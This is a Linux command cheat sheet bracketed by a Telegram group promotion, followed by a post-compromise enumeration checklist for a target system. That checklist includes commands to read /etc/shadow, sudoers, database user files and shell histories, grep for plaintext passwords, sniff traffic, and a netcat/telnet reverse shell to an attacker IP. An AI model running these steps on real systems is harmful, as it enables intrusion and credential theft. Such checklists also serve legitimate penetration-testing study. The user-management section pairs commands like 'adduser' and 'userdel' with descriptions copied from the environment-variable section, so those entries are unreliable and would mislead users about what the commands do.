*Do you want to become ethical hacker and want to know how hackers hack in Real World. Join the telegram group and be a
part of us *

Telegram = https://t.me/infosecbugbounty

ls [Lists all files and directories in the present
working directory]
ls-R [Lists files in sub-directories as well]
ls-a [Lists hidden files as well]
ls-al [Lists files and directories with detailed
information like permissions,size, owner, etc.]

cd or cd ~ [Navigate to HOME directory]
cd .. [Move one level up]
cd [To change to a particular directory]
cd / [Move to the root directory]

cat > filename [Creates a new file]
cat filename [Displays the file content]
cat file1 file2 > file3 [Joins two files (file1, file2)
and stores the output in a new
file (file3)]

mv file "new file path" [Moves the files to the new
location]
mv filename new_file_name [Renames the file to a new
filename]

sudo [Allows regular users to run programs with
the security privileges of the superuser
or root]
rm filename [Deletes a file]
man [Gives help information on a command
history Gives a list of all past commands
typed in the current terminal session]

clear [Clears the terminal]
mkdir directoryname [Creates a new directory in the
present working directory or a at the
specified path]
rmdir [Deletes a directory]
mv [Renames a directory]
pr -x [Divides the file into x columns]
pr -h [Assigns a header to the file]
pr -n [Denotes the file with Line Numbers]
lp -nc , lpr c [Prints "c" copies of the File]
lp-d lp-P [Specifies name of the printer]
apt-get [Command used to install and update
packages]

mail -s 'subject' -c 'cc-address' -b 'bcc-address' 'to-address' ( Command to send email)

mail -s "Subject" to-address < Filename (Command to send email with attachment)
File Permission commands

ls-l [to show file type and access permission]
r [read permission]
w [write permission]
x [execute permission]
-= [no permission]
Chown user [For changing the ownership of a
file/directory]

Chown user:group filename (change the user as well as group
for a file or directory)

Environment Variables command
echo $VARIABLE [To display value of a variable]
env [ Displays all environment variables]

VARIABLE_NAME= variable_value [Create a new variable]
Unset [Remove a variable]
export Variable=value [To set value of an
environment variable]
User management commands of linux

sudo adduser username [To display value of a variable]
sudo passwd -l 'username' [Displays all environment
variables]
sudo userdel -r 'username' [Create a new variable]
sudo usermod -a -G GROUPNAME USERNAME [Remove a variable]
sudo deluser USER GROUPNAME [To set value of an
environment variable]

Networking command

SSH username@ip-address or hostname [login into a remote
Linux machine using
SSH]
Ping hostname="" or ="" [To ping and Analyzing
network and host
connections]
dir [Display files in the current directory of a remote
computer]
cd "dirname" [change directory to "dirname" on a remote
computer]
put file [upload 'file' from local to remote computer]
get file [Download 'file' from remote to local computer]
quit [Logout]

Process command

bg [To send a process to the background]
fg [To run a stopped process in the foreground]
top [Details on all Active Processes]
ps [Give the status of processes running for a user]
ps PID [Gives the status of a particular process]
pidof [Gives the Process ID (PID) of a process]
kill PID [Kills a process]
nice [Starts a process with a given priority]
renice [Changes priority of an already running process]
df [Gives free hard disk space on your system]
free [Gives free RAM on your system]

VI Editing Commands

i [Insert at cursor (goes into insert mode)]
a [Write after cursor (goes into insert mode)]
A [Write at the end of line (goes into insert mode)]
ESC [Terminate insert mode]
u [Undo last change]
U [Undo all changes to the entire line]
o [Open a new line (goes into insert mode)]
dd [Delete line]
3dd [Delete 3 lines]
D [Delete contents of line after the cursor]
C [Delete contents of a line after the cursor and insert new text. Press ESC key to end insertion.]
dw [Delete word]
4dw [Delete 4 words]
cw [Change word]
x [Delete character at the cursor]
r [Replace character]
R [Overwrite characters from cursor onward
s [Substitute one character under cursor continue to
insert]
S [Substitute entire line and begin to insert at the
beginning of the line]
~ [Change case of individual character]

Operating System

What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release

What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

ps aux
ps -ef
top
cat /etc/services

Which service(s) are been running by root? Of these services, which are vulnerable

ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.r./

What jobs are scheduled?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

Whats cached? IP and/or MAC addresses

arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

Have you got a shell? Can you interact with the system?

nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?

id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything "interesting" in the home directorie(s)? If it's possible to access

ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Search Files
grep pattern files
Search for pattern in files
grep -i Case insens­itive search
grep -r Recursive search
grep -v Inverted search
grep -o Show matched part of file only
find /dir/ -name name* Find files starting with name in dir
find /dir/ -user name Find files owned by name in dir
find /dir/ -mmin num Find files modified less than num
minutes ago in dir
whereis command Find binary / source / manual for command
locate file
Find file (quick search of system index)

*Do you want to become ethical hacker and want to know how hackers hack in Real World. Join the telegram group and be a
part of us *

Telegram = https://t.me/infosecbugbounty